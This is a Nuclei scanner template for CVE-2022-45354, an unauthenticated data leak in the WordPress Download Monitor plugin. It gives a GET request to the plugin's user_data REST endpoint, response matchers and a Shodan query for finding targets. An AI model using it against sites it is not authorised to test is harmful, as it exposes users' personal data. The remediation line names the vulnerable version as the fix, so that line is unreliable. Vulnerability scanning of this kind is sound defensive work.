42 lines
1.5 KiB
YAML
42 lines
1.5 KiB
YAML
id: CVE-2022-45354
|
|
|
|
info:
|
|
name: Download Monitor <= 4.7.60 - Sensitive Information Exposure
|
|
author: DhiyaneshDK
|
|
severity: medium
|
|
description: |
|
|
The Download Monitor plugin for WordPress is vulnerable to Sensitive Information Exposure in versions up to, and including, 4.7.60 via REST API. This can allow unauthenticated attackers to extract sensitive data including user reports, download reports, and user data including email, role, id and other info (not passwords)
|
|
remediation: |
|
|
Update to the latest version of the Download Monitor plugin (4.7.60) or apply the provided patch to fix the vulnerability.
|
|
reference:
|
|
- https://github.com/RandomRobbieBF/CVE-2022-45354
|
|
- https://wordpress.org/plugins/download-monitor/
|
|
metadata:
|
|
verified: true
|
|
max-request: 1
|
|
shodan-query: html:"/wp-content/plugins/download-monitor/"
|
|
tags: cve,cve2023,wordpress,wp-plugin,download-monitor,wp
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/wp-json/download-monitor/v1/user_data"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- '"registered":'
|
|
- '"display_name":'
|
|
condition: and
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- application/json
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 490a0046304402202b5c87ca1023260f4efdf189c9853d10e43d226515063195b6b48f7f72d486f1022063ca220113fa902ef786d71ab90b4fb066f810430711acbad5b73287cff1da6e:922c64590222798bb761d5b6d8e72950 |